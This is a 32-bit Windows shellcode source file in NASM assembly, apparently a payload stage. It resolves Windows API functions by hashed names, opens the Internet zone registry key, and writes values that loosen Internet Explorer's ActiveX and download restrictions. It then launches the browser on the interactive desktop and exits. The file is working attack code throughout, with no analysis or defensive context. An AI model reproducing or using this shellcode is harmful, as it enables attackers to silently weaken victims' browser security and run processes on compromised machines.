177 lines
3.1 KiB
NASM
177 lines
3.1 KiB
NASM
BITS 32
|
|
GLOBAL _start
|
|
|
|
_start:
|
|
cld
|
|
call get_find_function
|
|
strings:
|
|
db "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", 0x0
|
|
reg_values:
|
|
db "1004120012011001"
|
|
url:
|
|
db "C:\progra~1\intern~1\iexplore -new", 0x0
|
|
|
|
get_find_function:
|
|
call startup
|
|
find_function:
|
|
pushad
|
|
mov ebp, [esp + 0x24]
|
|
mov eax, [ebp + 0x3c]
|
|
mov edi, [ebp + eax + 0x78]
|
|
add edi, ebp
|
|
mov ecx, [edi + 0x18]
|
|
mov ebx, [edi + 0x20]
|
|
add ebx, ebp
|
|
find_function_loop:
|
|
jecxz find_function_finished
|
|
dec ecx
|
|
mov esi, [ebx + ecx * 4]
|
|
add esi, ebp
|
|
compute_hash:
|
|
xor eax, eax
|
|
cdq
|
|
compute_hash_again:
|
|
lodsb
|
|
test al, al
|
|
jz compute_hash_finished
|
|
ror edx, 0xd
|
|
add edx, eax
|
|
jmp compute_hash_again
|
|
compute_hash_finished:
|
|
find_function_compare:
|
|
cmp edx, [esp + 0x28]
|
|
jnz find_function_loop
|
|
mov ebx, [edi + 0x24]
|
|
add ebx, ebp
|
|
mov cx, [ebx + 2 * ecx]
|
|
mov ebx, [edi + 0x1c]
|
|
add ebx, ebp
|
|
mov eax, [ebx + 4 * ecx]
|
|
add eax, ebp
|
|
mov [esp + 0x1c], eax
|
|
find_function_finished:
|
|
popad
|
|
retn 8
|
|
|
|
startup:
|
|
pop edi
|
|
pop ebx
|
|
find_kernel32:
|
|
xor edx, edx
|
|
mov eax, [fs:edx+0x30]
|
|
test eax, eax
|
|
js find_kernel32_9x
|
|
find_kernel32_nt:
|
|
mov eax, [eax + 0x0c]
|
|
mov esi, [eax + 0x1c]
|
|
lodsd
|
|
mov eax, [eax + 0x8]
|
|
jmp short find_kernel32_finished
|
|
find_kernel32_9x:
|
|
mov eax, [eax + 0x34]
|
|
add eax, byte 0x7c
|
|
mov eax, [eax + 0x3c]
|
|
find_kernel32_finished:
|
|
|
|
mov ebp, esp
|
|
find_kernel32_symbols:
|
|
push 0x73e2d87e ; ExitProcess
|
|
push eax
|
|
push 0x16b3fe72 ; CreateProcessA
|
|
push eax
|
|
push 0xec0e4e8e ; LoadLibraryA
|
|
push eax
|
|
call edi
|
|
xchg eax, esi
|
|
call edi
|
|
mov [ebp], eax
|
|
call edi
|
|
mov [ebp + 0x4], eax
|
|
|
|
load_advapi32:
|
|
push edx
|
|
push 0x32336970
|
|
push 0x61766461
|
|
push esp
|
|
call esi
|
|
|
|
resolve_advapi32_symbols:
|
|
push 0x02922ba9
|
|
push eax
|
|
push 0x2d1c9add
|
|
push eax
|
|
call edi
|
|
mov [ebp + 0x8], eax
|
|
call edi
|
|
xchg eax, edi
|
|
|
|
xchg esi, ebx
|
|
open_key:
|
|
push esp
|
|
push esi
|
|
push 0x80000001
|
|
call edi
|
|
pop ebx
|
|
add esi, byte (reg_values - strings)
|
|
|
|
push eax
|
|
mov edi, esp
|
|
set_values:
|
|
cmp byte [esi], 'C'
|
|
jz initialize_structs
|
|
push eax
|
|
lodsd
|
|
push eax
|
|
mov eax, esp
|
|
push byte 0x4
|
|
push edi
|
|
push byte 0x4
|
|
push byte 0x0
|
|
push eax
|
|
push ebx
|
|
call [ebp + 0x8]
|
|
jmp set_values
|
|
|
|
; This is NT specific, but it lets us execute iexplore regardless
|
|
; of what drive it's installed on so long as it's on the same drive
|
|
; as the WINDOWS directory, which it should always be.
|
|
fixup_drive_letter:
|
|
mov cl, byte [0x7ffe0030]
|
|
mov byte [esi], cl
|
|
|
|
initialize_structs:
|
|
push byte 0x54
|
|
pop ecx
|
|
sub esp, ecx
|
|
mov edi, esp
|
|
push edi
|
|
rep stosb
|
|
pop edi
|
|
mov byte [edi], 0x44
|
|
inc byte [edi + 0x2c]
|
|
inc byte [edi + 0x2d]
|
|
|
|
; set lpDesktop to WinSta0\Default so that this works with non-interactive services
|
|
push 0x00746c75
|
|
push 0x61666544
|
|
push 0x5c306174
|
|
push 0x536e6957
|
|
mov [edi + 8], esp
|
|
|
|
execute_process:
|
|
lea ebx, [edi + 0x44]
|
|
push ebx
|
|
push edi
|
|
push eax
|
|
push eax
|
|
push byte 0x10
|
|
push eax
|
|
push eax
|
|
push eax
|
|
push esi
|
|
push eax
|
|
call [ebp]
|
|
|
|
exit_process:
|
|
call [ebp + 0x4]
|